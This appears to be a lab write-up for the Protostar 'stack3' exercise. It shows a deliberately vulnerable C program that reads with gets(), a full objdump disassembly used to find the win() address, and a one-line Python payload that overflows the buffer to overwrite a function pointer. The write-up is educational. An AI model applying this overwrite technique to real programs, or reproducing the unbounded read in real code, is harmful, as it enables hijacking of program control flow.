Protostar vm, stack3

Here is the source of the vulnerable program:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Target of the exercise: never called by main, it only prints a marker line
 * so that a successful redirection of control flow is visible on stdout. */
void win()
{
puts("code flow successfully changed");
}

/* Reads one line from stdin into a fixed-size stack buffer and, if the
 * function pointer stored next to that buffer became non-zero, calls it.
 * The program never sets fp itself; the only way it can change is through
 * the out-of-bounds write described below. */
int main(int argc, char **argv)
{
/* volatile so the compiler must re-read fp after gets() instead of assuming
 * it is still 0 and dropping the branch below. */
volatile int (*fp)();
/* The objdump listing below places buffer at 0x1c(%esp) and fp at 0x5c(%esp):
 * exactly 64 bytes apart, so fp sits immediately past the end of buffer. */
char buffer[64];

fp = 0;

/* gets() takes no length: any line of 64 bytes or more (plus the terminator
 * it appends) writes past buffer and into fp. This is the defect the exercise
 * is about; the fix is a bounded read, fgets(buffer, sizeof buffer, stdin),
 * which stops at sizeof buffer - 1 characters. */
gets(buffer);

if(fp) {
/* Note: printing a function pointer through %08x is a format/argument type
 * mismatch; %p is the matching specifier. */
printf("calling function pointer, jumping to 0x%08x\n", fp);
/* Indirect call through a value that untrusted input can overwrite. */
fp();
}
}

This exercise is a bit different. We need to change the program's control flow: when the program calls fp, execution has to be redirected to the win function.

To do that we need to find the address at which the win function is loaded, for example with objdump (probably not the most convenient option):

user@protostar:/opt/protostar/bin$ objdump -d stack3

stack3: file format elf32-i386


Disassembly of section .init:

080482e0 <_init>:
80482e0: 55 push %ebp
80482e1: 89 e5 mov %esp,%ebp
80482e3: 53 push %ebx
80482e4: 83 ec 04 sub $0x4,%esp
80482e7: e8 00 00 00 00 call 80482ec <_init+0xc>
80482ec: 5b pop %ebx
80482ed: 81 c3 90 13 00 00 add $0x1390,%ebx
80482f3: 8b 93 fc ff ff ff mov -0x4(%ebx),%edx
80482f9: 85 d2 test %edx,%edx
80482fb: 74 05 je 8048302 <_init+0x22>
80482fd: e8 1e 00 00 00 call 8048320 <__gmon_start__@plt>
8048302: e8 f9 00 00 00 call 8048400 <frame_dummy>
8048307: e8 e4 01 00 00 call 80484f0 <__do_global_ctors_aux>
804830c: 58 pop %eax
804830d: 5b pop %ebx
804830e: c9 leave
804830f: c3 ret

Disassembly of section .plt:

08048310 <__gmon_start__@plt-0x10>:
8048310: ff 35 80 96 04 08 pushl 0x8049680
8048316: ff 25 84 96 04 08 jmp *0x8049684
804831c: 00 00 add %al,(%eax)
...

08048320 <__gmon_start__@plt>:
8048320: ff 25 88 96 04 08 jmp *0x8049688
8048326: 68 00 00 00 00 push $0x0
804832b: e9 e0 ff ff ff jmp 8048310 <_init+0x30>

08048330 <gets@plt>:
8048330: ff 25 8c 96 04 08 jmp *0x804968c
8048336: 68 08 00 00 00 push $0x8
804833b: e9 d0 ff ff ff jmp 8048310 <_init+0x30>

08048340 <__libc_start_main@plt>:
8048340: ff 25 90 96 04 08 jmp *0x8049690
8048346: 68 10 00 00 00 push $0x10
804834b: e9 c0 ff ff ff jmp 8048310 <_init+0x30>

08048350 <printf@plt>:
8048350: ff 25 94 96 04 08 jmp *0x8049694
8048356: 68 18 00 00 00 push $0x18
804835b: e9 b0 ff ff ff jmp 8048310 <_init+0x30>

08048360 <puts@plt>:
8048360: ff 25 98 96 04 08 jmp *0x8049698
8048366: 68 20 00 00 00 push $0x20
804836b: e9 a0 ff ff ff jmp 8048310 <_init+0x30>

Disassembly of section .text:

08048370 <_start>:
8048370: 31 ed xor %ebp,%ebp
8048372: 5e pop %esi
8048373: 89 e1 mov %esp,%ecx
8048375: 83 e4 f0 and $0xfffffff0,%esp
8048378: 50 push %eax
8048379: 54 push %esp
804837a: 52 push %edx
804837b: 68 80 84 04 08 push $0x8048480
8048380: 68 90 84 04 08 push $0x8048490
8048385: 51 push %ecx
8048386: 56 push %esi
8048387: 68 38 84 04 08 push $0x8048438
804838c: e8 af ff ff ff call 8048340 <__libc_start_main@plt>
8048391: f4 hlt
8048392: 90 nop
8048393: 90 nop
8048394: 90 nop
8048395: 90 nop
8048396: 90 nop
8048397: 90 nop
8048398: 90 nop
8048399: 90 nop
804839a: 90 nop
804839b: 90 nop
804839c: 90 nop
804839d: 90 nop
804839e: 90 nop
804839f: 90 nop

080483a0 <__do_global_dtors_aux>:
80483a0: 55 push %ebp
80483a1: 89 e5 mov %esp,%ebp
80483a3: 53 push %ebx
80483a4: 83 ec 04 sub $0x4,%esp
80483a7: 80 3d a4 96 04 08 00 cmpb $0x0,0x80496a4
80483ae: 75 3f jne 80483ef <__do_global_dtors_aux+0x4f>
80483b0: a1 a8 96 04 08 mov 0x80496a8,%eax
80483b5: bb a0 95 04 08 mov $0x80495a0,%ebx
80483ba: 81 eb 9c 95 04 08 sub $0x804959c,%ebx
80483c0: c1 fb 02 sar $0x2,%ebx
80483c3: 83 eb 01 sub $0x1,%ebx
80483c6: 39 d8 cmp %ebx,%eax
80483c8: 73 1e jae 80483e8 <__do_global_dtors_aux+0x48>
80483ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
80483d0: 83 c0 01 add $0x1,%eax
80483d3: a3 a8 96 04 08 mov %eax,0x80496a8
80483d8: ff 14 85 9c 95 04 08 call *0x804959c(,%eax,4)
80483df: a1 a8 96 04 08 mov 0x80496a8,%eax
80483e4: 39 d8 cmp %ebx,%eax
80483e6: 72 e8 jb 80483d0 <__do_global_dtors_aux+0x30>
80483e8: c6 05 a4 96 04 08 01 movb $0x1,0x80496a4
80483ef: 83 c4 04 add $0x4,%esp
80483f2: 5b pop %ebx
80483f3: 5d pop %ebp
80483f4: c3 ret
80483f5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80483f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi

08048400 <frame_dummy>:
8048400: 55 push %ebp
8048401: 89 e5 mov %esp,%ebp
8048403: 83 ec 18 sub $0x18,%esp
8048406: a1 a4 95 04 08 mov 0x80495a4,%eax
804840b: 85 c0 test %eax,%eax
804840d: 74 12 je 8048421 <frame_dummy+0x21>
804840f: b8 00 00 00 00 mov $0x0,%eax
8048414: 85 c0 test %eax,%eax
8048416: 74 09 je 8048421 <frame_dummy+0x21>
8048418: c7 04 24 a4 95 04 08 movl $0x80495a4,(%esp)
804841f: ff d0 call *%eax
8048421: c9 leave
8048422: c3 ret
8048423: 90 nop

08048424 <win>:
8048424: 55 push %ebp
8048425: 89 e5 mov %esp,%ebp
8048427: 83 ec 18 sub $0x18,%esp
804842a: c7 04 24 40 85 04 08 movl $0x8048540,(%esp)
8048431: e8 2a ff ff ff call 8048360 <puts@plt>
8048436: c9 leave
8048437: c3 ret

08048438 <main>:
8048438: 55 push %ebp
8048439: 89 e5 mov %esp,%ebp
804843b: 83 e4 f0 and $0xfffffff0,%esp
804843e: 83 ec 60 sub $0x60,%esp
8048441: c7 44 24 5c 00 00 00 movl $0x0,0x5c(%esp)
8048448: 00
8048449: 8d 44 24 1c lea 0x1c(%esp),%eax
804844d: 89 04 24 mov %eax,(%esp)
8048450: e8 db fe ff ff call 8048330 <gets@plt>
8048455: 83 7c 24 5c 00 cmpl $0x0,0x5c(%esp)
804845a: 74 1b je 8048477 <main+0x3f>
804845c: b8 60 85 04 08 mov $0x8048560,%eax
8048461: 8b 54 24 5c mov 0x5c(%esp),%edx
8048465: 89 54 24 04 mov %edx,0x4(%esp)
8048469: 89 04 24 mov %eax,(%esp)
804846c: e8 df fe ff ff call 8048350 <printf@plt>
8048471: 8b 44 24 5c mov 0x5c(%esp),%eax
8048475: ff d0 call *%eax
8048477: c9 leave
8048478: c3 ret
8048479: 90 nop
804847a: 90 nop
804847b: 90 nop
804847c: 90 nop
804847d: 90 nop
804847e: 90 nop
804847f: 90 nop

08048480 <__libc_csu_fini>:
8048480: 55 push %ebp
8048481: 89 e5 mov %esp,%ebp
8048483: 5d pop %ebp
8048484: c3 ret
8048485: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
8048489: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi

08048490 <__libc_csu_init>:
8048490: 55 push %ebp
8048491: 89 e5 mov %esp,%ebp
8048493: 57 push %edi
8048494: 56 push %esi
8048495: 53 push %ebx
8048496: e8 4f 00 00 00 call 80484ea <__i686.get_pc_thunk.bx>
804849b: 81 c3 e1 11 00 00 add $0x11e1,%ebx
80484a1: 83 ec 1c sub $0x1c,%esp
80484a4: e8 37 fe ff ff call 80482e0 <_init>
80484a9: 8d bb 18 ff ff ff lea -0xe8(%ebx),%edi
80484af: 8d 83 18 ff ff ff lea -0xe8(%ebx),%eax
80484b5: 29 c7 sub %eax,%edi
80484b7: c1 ff 02 sar $0x2,%edi
80484ba: 85 ff test %edi,%edi
80484bc: 74 24 je 80484e2 <__libc_csu_init+0x52>
80484be: 31 f6 xor %esi,%esi
80484c0: 8b 45 10 mov 0x10(%ebp),%eax
80484c3: 89 44 24 08 mov %eax,0x8(%esp)
80484c7: 8b 45 0c mov 0xc(%ebp),%eax
80484ca: 89 44 24 04 mov %eax,0x4(%esp)
80484ce: 8b 45 08 mov 0x8(%ebp),%eax
80484d1: 89 04 24 mov %eax,(%esp)
80484d4: ff 94 b3 18 ff ff ff call *-0xe8(%ebx,%esi,4)
80484db: 83 c6 01 add $0x1,%esi
80484de: 39 fe cmp %edi,%esi
80484e0: 72 de jb 80484c0 <__libc_csu_init+0x30>
80484e2: 83 c4 1c add $0x1c,%esp
80484e5: 5b pop %ebx
80484e6: 5e pop %esi
80484e7: 5f pop %edi
80484e8: 5d pop %ebp
80484e9: c3 ret

080484ea <__i686.get_pc_thunk.bx>:
80484ea: 8b 1c 24 mov (%esp),%ebx
80484ed: c3 ret
80484ee: 90 nop
80484ef: 90 nop

080484f0 <__do_global_ctors_aux>:
80484f0: 55 push %ebp
80484f1: 89 e5 mov %esp,%ebp
80484f3: 53 push %ebx
80484f4: 83 ec 04 sub $0x4,%esp
80484f7: a1 94 95 04 08 mov 0x8049594,%eax
80484fc: 83 f8 ff cmp $0xffffffff,%eax
80484ff: 74 13 je 8048514 <__do_global_ctors_aux+0x24>
8048501: bb 94 95 04 08 mov $0x8049594,%ebx
8048506: 66 90 xchg %ax,%ax
8048508: 83 eb 04 sub $0x4,%ebx
804850b: ff d0 call *%eax
804850d: 8b 03 mov (%ebx),%eax
804850f: 83 f8 ff cmp $0xffffffff,%eax
8048512: 75 f4 jne 8048508 <__do_global_ctors_aux+0x18>
8048514: 83 c4 04 add $0x4,%esp
8048517: 5b pop %ebx
8048518: 5d pop %ebp
8048519: c3 ret
804851a: 90 nop
804851b: 90 nop

Disassembly of section .fini:

0804851c <_fini>:
804851c: 55 push %ebp
804851d: 89 e5 mov %esp,%ebp
804851f: 53 push %ebx
8048520: 83 ec 04 sub $0x4,%esp
8048523: e8 00 00 00 00 call 8048528 <_fini+0xc>
8048528: 5b pop %ebx
8048529: 81 c3 54 11 00 00 add $0x1154,%ebx
804852f: e8 6c fe ff ff call 80483a0 <__do_global_dtors_aux>
8048534: 59 pop %ecx
8048535: 5b pop %ebx
8048536: c9 leave
8048537: c3 ret

Here we can see the address of the function: 08048424

Let's test that:

user@protostar:/opt/protostar/bin$ py -c 'print 64*"a"+"\x24\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed